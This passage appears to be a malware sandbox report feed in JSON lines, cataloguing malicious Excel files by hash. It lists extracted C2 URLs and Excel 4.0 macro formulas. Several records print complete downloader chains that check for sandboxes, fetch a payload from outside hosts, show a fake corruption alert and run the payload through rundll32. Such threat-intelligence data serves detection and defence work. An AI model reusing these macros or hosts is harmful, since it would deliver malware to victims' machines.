,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ovAyMoJDb7\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"90d15d57c0dfbff0a144726808088dc85f73e8b0855607ea4f1574cc6f5ef34c"},"analysis":{"reported":"2020-04-09T16:17:42Z","score":10},"files":[{"filename":"90d15d57c0dfbff0a144726808088dc85f73e8b0855607ea4f1574cc6f5ef34c","filesize":112128,"md5":"c877ea607734267184e70cb79bb20db3","sha1":"07dffefb167090155f61fd4bb4ef5c25932d7e8e","sha256":"90d15d57c0dfbff0a144726808088dc85f73e8b0855607ea4f1574cc6f5ef34c","sha512":"e60bedf34b7102c9b5290b93b1b65d4cbc0413e21ef4c220ebac372edf6d2daa59803269efc38e3824234f242ccac0d61c479edbb0208ee6cc7e67aab1ebcb03","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"90d15d57c0dfbff0a144726808088dc85f73e8b0855607ea4f1574cc6f5ef34c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"90d7c1c62d3438969ccd1a9059940d0c88a64825d4241ffb32e11da8f6f6639e"},"analysis":{"reported":"2020-04-09T16:17:42Z","score":10},"files":[{"filename":"90d7c1c62d3438969ccd1a9059940d0c88a64825d4241ffb32e11da8f6f6639e","filesize":185344,"md5":"42e756ba79a31aa662dc5a169fede0e6","sha1":"539647893ec53bbe69515301e2c2c85c7f95e2b6","sha256":"90d7c1c62d3438969ccd1a9059940d0c88a64825d4241ffb32e11da8f6f6639e","sha512":"06adddaa1094e453f5517e7a5cdcc59451959953e9ddaea0d114e6ccaf9a9ef2b31ec72d0d5101db20f6c745200d3e2eebf7310033ec677f2ebf5595a3d173e4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"90d7c1c62d3438969ccd1a9059940d0c88a64825d4241ffb32e11da8f6f6639e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"90d825c4284f01bf200fec9fc2266ba06471269ab405dc4239715009a945117d"},"analysis":{"reported":"2020-04-09T16:17:42Z","score":10},"files":[{"filename":"90d825c4284f01bf200fec9fc2266ba06471269ab405dc4239715009a945117d","filesize":167424,"md5":"48d6685f438724df69c3de7adb4dfa5d","sha1":"a493acaa7e18e1fcb75536a8a9413afeb151c321","sha256":"90d825c4284f01bf200fec9fc2266ba06471269ab405dc4239715009a945117d","sha512":"75aaaf6f9148847185de40559286a4e4070ae763c85a578e31cc1f6e1c9c2f278014b81a49c16e51cf670ea55c10aab208bd2b5b4bfb920ee0df25278d0620ce","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"90d825c4284f01bf200fec9fc2266ba06471269ab405dc4239715009a945117d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"TKNxsPYLYs\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"90d9900bb1cee409eddcff00678a57f83f6b8d97e968a7c1969e660b34fb9b6a"},"analysis":{"reported":"2020-04-09T16:17:42Z","score":10},"files":[{"filename":"90d9900bb1cee409eddcff00678a57f83f6b8d97e968a7c1969e660b34fb9b6a","filesize":185344,"md5":"5cb1c7b1162fad4b69256e2e1b4ba4af","sha1":"36ccd065d52c17004e3afec412e682869e5b20da","sha256":"90d9900bb1cee409eddcff00678a57f83f6b8d97e968a7c1969e660b34fb9b6a","sha512":"1edeaff1da68c1e284ad5bcb2a1ab6f53f349a5b8bf054b2b10f8935d0536d8a20cf4cd4e8ea21f54d4b62b11e38152582ef02d73c282b911fe9a32587ac402e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"90d9900bb1cee409eddcff00678a57f83f6b8d97e968a7c1969e660b34fb9b6a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"90da8d544a95e887255976bcb0f3d50ef80ae454710b0fdd4d501312d2d9c548"},"analysis":{"reported":"2020-04-09T16:17:42Z","score":10},"files":[{"filename":"90da8d544a95e887255976bcb0f3d50ef80ae454710b0fdd4d501312d2d9c548","filesize":168960,"md5":"32b754d299f097dbbe93b35a9a6b2d52","sha1":"6953f706509352ba547b1e1ffcb9b77c95134d24","sha256":"90da8d544a95e887255976bcb0f3d50ef80ae454710b0fdd4d501312d2d9c548","sha512":"26280a8b97ac8dcc9fea2faf50ed843a3c7f280a437de2dbc1e83ecd231e8ab24f9e7ef2037f5ac5c77b89736319435a0199a23e7d42ec1c0b4ba48996f048d1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"90da8d544a95e887255976bcb0f3d50ef80ae454710b0fdd4d501312d2d9c548.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"njyadnQGlR\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"90f1ddcbd7ed5e9b326799f61ef2bb24b25b2ed899dc6a90e8a33a9ce6ea9145"},"analysis":{"reported":"2020-04-09T16:17:42Z","score":10},"files":[{"filename":"90f1ddcbd7ed5e9b326799f61ef2bb24b25b2ed899dc6a90e8a33a9ce6ea9145","filesize":141824,"md5":"5e24e18513a38671cc95a4ab2a800a3c","sha1":"02c900a42c44ab8ffb6ab569118aa78e15965b06","sha256":"90f1ddcbd7ed5e9b326799f61ef2bb24b25b2ed899dc6a90e8a33a9ce6ea9145","sha512":"b1787875400b4ac60e03fb3ef424c46e2342fd25f655c42b9df9d3149410ce6f5b21f1958466f64d8e3fb734bf2cf336d5c8af475be3cea27d0c4c6e06696ca5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"90f1ddcbd7ed5e9b326799f61ef2bb24b25b2ed899dc6a90e8a33a9ce6ea9145.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"ZslpUhYJD8\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"90fbc4895f7345bf1084b7bf21a330003ce0d39ffa2f949e445f5027547f38a8"},"analysis":{"reported":"2020-04-09T16:17:42Z","score":10},"files":[{"filename":"90fbc4895f7345bf1084b7bf21a330003ce0d39ffa2f949e445f5027547f38a8","filesize":170496,"md5":"9cfecd37cff9cbf05b2aae7e9ad3736b","sha1":"3157ec6543362bb1239b8cbe57e8d7cb5b1ba15e","sha256":"90fbc4895f7345bf1084b7bf21a330003ce0d39ffa2f949e445f5027547f38a8","sha512":"fc369893a7c0d35239669801b0350546c4eb4d62655b652c9d0fda2a8e123ff95f6803a7df86be8e282914973753601674dd79ee9633fb3de6095f4ab5f6572f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"90fbc4895f7345bf1084b7bf21a330003ce0d39ffa2f949e445f5027547f38a8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2OCHqJhohi\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"91005ad2c6ec585ee97fe16d3eabbe1bddca15d9cf92c8f2846ea1d980677f1b"},"analysis":{"reported":"2020-04-09T16:17:42Z","score":10},"files":[{"filename":"91005ad2c6ec585ee97fe16d3eabbe1bddca15d9cf92c8f2846ea1d980677f1b","filesize":104448,"md5":"06a8e5d7b34cccdafbf8b191b40d7488","sha1":"930f3db85fa3f7b39dcb381aa8d11e0029f7f2ca","sha256":"91005ad2c6ec585ee97fe16d3eabbe1bddca15d9cf92c8f2846ea1d980677f1b","sha512":"96d79ec5c392ab07f5dfa1b48dd7d95a7141fe75246a52a2d468d5dc2a4d0697dbd837ecfbb78e65d35f47c04e8ce3e3b6785aab325a3c95d147d14651d809bb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"91005ad2c6ec585ee97fe16d3eabbe1bddca15d9cf92c8f2846ea1d980677f1b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"G7svLZWt6O\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"910f52d86a40dfb183b2890ae05e2f500d082c4d34f86272aaea1599de905d70"},"analysis":{"reported":"2020-04-09T16:17:42Z","score":10},"files":[{"filename":"910f52d86a40dfb183b2890ae05e2f500d082c4d34f86272aaea1599de905d70","filesize":63488,"md5":"2279b7a8d534f0a4109e1f9c1c5f0c67","sha1":"0d7a6ededba64df9a474e2eba32068774acf74a6","sha256":"910f52d86a40dfb183b2890ae05e2f500d082c4d34f86272aaea1599de905d70","sha512":"5a1d5b1927ab5614bc8e83e9aadf7e9a0d91c58422dafb883c832f9390c7a0b1363636871d1ab10fa54f0cd3cad8239fee478699084f6320195b3b18384b5883","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"910f52d86a40dfb183b2890ae05e2f500d082c4d34f86272aaea1599de905d70.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$19C$13,R$19C$15,R$19C$16,R$19C$17,R$19C$19,R$19C$21)\nSUM(R$43C$13,R$22C$15,R$43C$16,R$43C$17,R$43C$19,R$22C$21)\nSUM(R$19C$15,R$19C$16,R$19C$17,R$19C$19,R$19C$21)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9111cc3df5acd45dd3ef9fa5e9a4001528987680985ec891462f8684a4824ceb"},"analysis":{"reported":"2020-04-09T16:17:42Z","score":10},"files":[{"filename":"9111cc3df5acd45dd3ef9fa5e9a4001528987680985ec891462f8684a4824ceb","filesize":206336,"md5":"f23ec433b3c5898ad473292c1e8c82da","sha1":"dea87c8e34470617e63f1f161ab81bab4ac3d5c3","sha256":"9111cc3df5acd45dd3ef9fa5e9a4001528987680985ec891462f8684a4824ceb","sha512":"e6fd38d066e2fbc1ba85364da9a5a58c53ed703b68d577992bac32355519870f741c9ab74ea8bce71a1b8d38626694c671af0b8cf9a6176250ad7bd48ba2e463","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9111cc3df5acd45dd3ef9fa5e9a4001528987680985ec891462f8684a4824ceb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XCFqLoQumQ\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9116c3fdb758c140b5d8ff6371e48602d89331bab470017994daf0c391eef5d3"},"analysis":{"reported":"2020-04-09T16:17:42Z","score":10},"files":[{"filename":"9116c3fdb758c140b5d8ff6371e48602d89331bab470017994daf0c391eef5d3","filesize":168448,"md5":"bebcc7c761d440086604dcc86bd14ae3","sha1":"d51d1c8150a5e817735ed0d703b17acf73ae886d","sha256":"9116c3fdb758c140b5d8ff6371e48602d89331bab470017994daf0c391eef5d3","sha512":"1b45b035499e8da47a5f75b1b056553ca6f66e10f6c79a1d3b88686345057d567a2e7a4d0f6d0244cce0d13b0218121211823eba10be6fdcb2f3a17452f7df45","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9116c3fdb758c140b5d8ff6371e48602d89331bab470017994daf0c391eef5d3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iE9DJpIrbU\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"912298ea26b2a74f93456c9c54ab817a6cf3df6da3ac0e402332562223a57b16"},"analysis":{"reported":"2020-04-09T16:17:42Z","score":10},"files":[{"filename":"912298ea26b2a74f93456c9c54ab817a6cf3df6da3ac0e402332562223a57b16","filesize":225280,"md5":"4e76342f1b133d40118748256967242d","sha1":"26752b546479ca2254aa3e8fdc6b70fb5b862a78","sha256":"912298ea26b2a74f93456c9c54ab817a6cf3df6da3ac0e402332562223a57b16","sha512":"59a2d42c3289e9a2a8d6f0392a3bab01535f3f535de653e61c7aab7797219bb48277c4d8adcce09c30c9227c6c5fbc20ca842c5ef88b8738982f4cb6995807ad","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"912298ea26b2a74f93456c9c54ab817a6cf3df6da3ac0e402332562223a57b16.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vPkR3WSbY6\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"913410a0b48f7dd710462e15aa637227747a793f89961fe58118b78cb62075b5"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"913410a0b48f7dd710462e15aa637227747a793f89961fe58118b78cb62075b5","filesize":104448,"md5":"9e94564141b5f7a62389eee9560c52b1","sha1":"b5333217638c7ade624e7fcb040b7702b3999ec2","sha256":"913410a0b48f7dd710462e15aa637227747a793f89961fe58118b78cb62075b5","sha512":"4729618800bfeef7d654f15cdb17128d3c7e3ec6b4f8b6d3518daa9ee885795449c7f766f02b9e18508446d918115667ad0903157dcd9189db8e17ca00484752","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"913410a0b48f7dd710462e15aa637227747a793f89961fe58118b78cb62075b5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ZNAOcqX8hz\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"913fbd48e8603b406edf8a99e4f9b5ba2c4e2b8839ba9d63a29106688d5255a8"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"913fbd48e8603b406edf8a99e4f9b5ba2c4e2b8839ba9d63a29106688d5255a8","filesize":219136,"md5":"9b9e112320807d15de661faefcc3bcd0","sha1":"f8b449276ffeb8eba354f77c4648b0176d732af7","sha256":"913fbd48e8603b406edf8a99e4f9b5ba2c4e2b8839ba9d63a29106688d5255a8","sha512":"454fe89ab6f43382d9cfd8aefdaf996a4c89116292a0cc8178838dc978ae31b2c44c798e8b5f15ea913c4d4c570175c08ce054fc9c18a96d3848c2168592bce0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"913fbd48e8603b406edf8a99e4f9b5ba2c4e2b8839ba9d63a29106688d5255a8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XwMV1zriDx\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"91426bf12576ac2803207ecafef696a7e1f42bf2477069f6ba9072400b2db6b9"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"91426bf12576ac2803207ecafef696a7e1f42bf2477069f6ba9072400b2db6b9","filesize":112128,"md5":"a04b620bdc81025ed0ceb702f2873e24","sha1":"258a44ef370fba189ce50399c35b1c906a661ff9","sha256":"91426bf12576ac2803207ecafef696a7e1f42bf2477069f6ba9072400b2db6b9","sha512":"df40f45e3e326e16b96e57161ea368952c825db8cdbf2c5aa99e4ca754d46df04a0ce7f4438c490056d9ea5b0c24d513e0728b13b995a02a73b3ecd96f803667","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"91426bf12576ac2803207ecafef696a7e1f42bf2477069f6ba9072400b2db6b9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"914b2385e14cdb5d6ec0f4763344681ad9477f3a006fa084c8feaed708559080"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"914b2385e14cdb5d6ec0f4763344681ad9477f3a006fa084c8feaed708559080","filesize":167936,"md5":"34d488350dd6365ba9e9fbf978fb9647","sha1":"640d2d9a092c6c408fa505d1fc07bde12dd61568","sha256":"914b2385e14cdb5d6ec0f4763344681ad9477f3a006fa084c8feaed708559080","sha512":"ab4450916430dfae5c385beee047c24d502ab0487e0c32bc2d9b89ef6abec43701a03c0c94da5e3db85c5dd00425ed950d0299b9176dadfb5e04f71e2c344fbb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"914b2385e14cdb5d6ec0f4763344681ad9477f3a006fa084c8feaed708559080.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QcyScKqIoZ\",TRUE)\nGOTO(R$0C$19)"}}}]}
